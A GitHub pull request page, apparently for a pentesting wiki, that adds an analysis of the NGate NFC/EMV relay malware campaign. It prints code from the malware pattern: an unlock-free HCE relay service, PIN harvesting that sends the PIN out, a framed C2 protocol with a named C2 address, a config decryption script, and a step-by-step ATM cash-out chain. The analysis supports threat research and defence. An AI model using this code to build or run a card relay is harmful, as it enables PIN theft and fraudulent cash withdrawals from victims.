Skip to content

Analysis of NGate malware campaign (NFC relay) #1556

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Analysis of NGate malware campaign (NFC relay) #1556

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
7 changes: 5 additions & 2 deletions src/pentesting-web/xs-search/css-injection/less-code-injection.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,4 +1,6 @@
## LESS Code Injection leading to SSRF & Local File Read
# LESS Code Injection leading to SSRF & Local File Read

{{#include ../../../banners/hacktricks-training.md}}

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.

Expand Down Expand Up @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \

* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
{{#include ../../../banners/hacktricks-training.md}}
120 changes: 119 additions & 1 deletion src/todo/radio-hacking/pentesting-rfid.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -156,6 +156,121 @@ If you need a **long-range**, **battery-powered** solution for harvesting HID Pr
maxiprox-mobile-cloner.md
{{#endref}}

## NFC/EMV Relay via Android Reader↔HCE Emitter

Classic EMV relay can be implemented with 2 Android devices: a victim-side reader that captures live APDUs and PIN from a real card, and an attacker-side HCE emitter at the terminal that forwards APDUs upstream. The analyzed NGate kit abuses legit Android NFC APIs and a simple framed TCP C2 to orchestrate real-time ATM cash-outs.

Key building blocks

- Reader-mode app (victim): uses NFC reader APIs to parse EMV (PAN/expiry/AIDs), displays scheme by AID, asks for PIN and exfiltrates immediately.
- Emitter-mode app (ATM side): implements Host Card Emulation (HCE) with `android:requireDeviceUnlock="false"` and a payment AID; `processCommandApdu()` forwards APDUs to C2 and returns minimal response.
- Wire protocol: length-prefixed frames, periodic keepalive; optionally TLS.

Android surface (Manifest/HCE)

```xml
<uses-permission android:name="android.permission.NFC"/>
<uses-permission android:name="android.permission.INTERNET"/>
<service android:name=".nfc.hce.ApduService"
android:permission="android.permission.BIND_NFC_SERVICE"
android:exported="true">
<intent-filter>
<action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
<meta-data android:name="android.nfc.cardemulation.host_apdu_service"
android:resource="@xml/hce"/>
</service>
```

hce.xml example (no unlock + payment AID)

```xml
<host-apdu-service android:requireDeviceUnlock="false"
android:description="relay">
<aid-group android:category="other">
<aid-filter android:name="F001020304050607"/>
</aid-group>
<aid-group android:category="payment">
<aid-filter android:name="F001020304050607"/>
</aid-group>
</host-apdu-service>
```

Transparent relay endpoint (HCE)

```java
@Override public byte[] processCommandApdu(byte[] apdu, Bundle extras) {
Log.d("ApduService", "APDU-IN: " + toHex(apdu));
bus.forward(apdu); // send upstream to C2/reader
return new byte[0]; // empty response, pure relay endpoint
}
```

EMV scheme inference by AID (examples)

- A000000004 → Mastercard
- A000000003 → Visa
- A000000658 → MIR
- A000000333 → UnionPay

PIN harvesting pattern (victim UI)

```java
// Custom keypad publishes when required length (e.g., 4) is reached
if (pin.length() == 4) postDelayed(() -> bus.publish(pin), 100L);
// Network immediately exfiltrates via dedicated opcode
send(OP_PIN_REQ, pin.getBytes(StandardCharsets.UTF_8));
```

Framed C2 (cleartext example)

- Client→Server: int32 len | int32 opcode | body
- Server→Client: int32 len | body (opcode inside payload)
- Reject bodies > ~100 MiB; keepalive ~7s (PING)

```java
// send
out.writeInt(body.length); out.writeInt(op); out.write(body); out.flush();
// recv
int len = in.readInt(); byte[] body = new byte[len]; in.readFully(body);
```

Config concealment: cert-derived XOR

- Native lib derives a 32-byte key as SHA‑256 of the app signing certificate (DER).
- C2 config is ASCII‑hex in assets (e.g., `assets/____`), hex-decoded and XOR-ed with the key repeating every 32 bytes:

```c
for (size_t i = 0; i < len; i++) pt[i] = ct[i] ^ key[i & 31];
```

Offline PoC to decrypt config

```bash
# Extract signing cert digest
apksigner verify --print-certs sample.apk
# "Signer #1 certificate SHA-256 digest: <hex>"
```

```python
import pathlib
key = bytes.fromhex("<sha256_of_signing_cert>")
ct = bytes.fromhex(pathlib.Path("/path/to/assets/____").read_text().strip())
pt = bytes(c ^ key[i % 32] for i, c in enumerate(ct))
print(pt.decode("utf-8", errors="replace"))
```

Sample decrypted fields: `host`, `port`, `sharedToken`, `tls`, `mode`, `reader`, `uniqueID`, `ttd`.

Relay chain (end-to-end)

1) Victim installs APK, opens app → native init decrypts config from assets.
2) App connects to C2 (e.g., `91.84.97.13:5653`) using framed TCP; keepalive ~7s.
3) Victim taps card → reader extracts PAN/expiry/AIDs and sends CARD_DISCOVERED.
4) Victim enters PIN → keypad publishes and exfiltrates via PIN_REQ; server replies VALID/INVALID for UI only.
5) Attacker device at terminal runs HCE emitter relaying APDUs to the ATM and performs cash-out.

---

## References
Expand All @@ -165,5 +280,8 @@ maxiprox-mobile-cloner.md
- [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
- [MIFARE security overview (Wikipedia)](https://en.wikipedia.org/wiki/MIFARE#Security)
- [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
- [Analysis of NGate malware campaign (CERT-PL)](https://cert.pl/en/posts/2025/11/analiza-ngate/)
- [Android apksigner – verify/print-certs](https://developer.android.com/studio/command-line/apksigner)
- [Android Host Card Emulation (HCE) overview](https://developer.android.com/guide/topics/connectivity/nfc/hce)

{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}